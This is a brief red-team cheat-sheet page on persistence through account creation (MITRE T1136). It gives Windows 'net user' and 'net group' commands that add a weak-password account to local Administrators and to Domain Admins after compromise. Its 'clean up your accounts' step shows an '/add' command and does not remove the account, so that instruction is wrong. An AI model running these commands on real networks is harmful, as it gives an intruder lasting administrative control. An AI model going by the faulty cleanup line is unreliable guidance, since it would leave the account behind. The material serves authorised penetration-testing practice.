Create Account for Persistence

Secondary Categories: 02-Persistence

Local Account

Once you’ve gained administrative access to the system you can add a local account

net user ap3x Password123 /add

We can add the user we just created to the local system group.

net localgroup administrators ap3x /add

Clean up your accounts after an engagement.

net user ap3x /add

Domain Account

After obtaining domain administrator in an engagement an account can be created and added to one of the admin groups to persist on the network and perform other post exploitation actions

net user ap3x Password123 /add /domain
net group "Domain Admins" ap3x /add /domain

Another good method is to add a comment to the user account and set it to expire just in case you forget to clean up or lose access

net user ap3x /comment:"Account created during red team assesment"
net user ap3x /expires:01/01/2023

Title	URL
MITRE	https://attack.mitre.org/techniques/T1136

Also Check Out:

PLACEHOLDER

The Void 🌌

Explorer

Create Account for Persistence

Local Account

Domain Account

Also Check Out:

Graph View

Backlinks

Recent Blog Posts

No More Network Bottlenecks

Unmasking Secrets - Deciphering Encrypted Passwords through Reverse Engineering

Conquering Goliath as a CCDC Blue Teamer

Explorer

Table of Contents

Recent Blog Posts

No More Network Bottlenecks

Unmasking Secrets - Deciphering Encrypted Passwords through Reverse Engineering

Conquering Goliath as a CCDC Blue Teamer